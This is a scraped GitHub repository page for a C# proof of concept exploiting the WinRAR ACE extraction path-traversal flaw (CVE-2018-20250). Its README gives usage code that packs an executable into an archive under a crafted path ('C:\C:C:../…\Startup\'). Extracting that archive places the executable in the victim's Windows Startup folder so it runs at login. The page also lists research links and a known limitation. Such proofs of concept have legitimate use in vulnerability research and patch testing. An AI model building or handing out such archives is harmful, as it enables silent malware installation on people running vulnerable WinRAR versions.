Skip to content
Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).
Branch: master
Clone or download
Latest commit 140a4d6 Mar 1, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
AceFile.cs Create AceFile.cs Feb 23, 2019
AceVolume.cs
README.md
Utils.cs Create Utils.cs Feb 23, 2019

README.md

CVE-2018-20250-WinRAR-ACE

Proof of concept code in C# to exploit the WinRAR ACE file extraction path (CVE-2018-20250).

Resources

https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://github.com/droe/acefile https://apidoc.roe.ch/acefile/latest/

Dependencies

InvertedTomato.Crc (you can install it with NuGet) for the checksum method. You can use any other JAMCRC implementation.

How to use

  AceVolume av = new AceVolume();
  AceFile f = new AceFile(
    @"D:\some_file.exe",
    @"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
  );
  av.AddFile(f);
  av.Save("exploit.rar");

Bugs

Seems that it only extracts to startup folder when the .rar file is in Desktop or any folder on the same level.

You can’t perform that action at this time.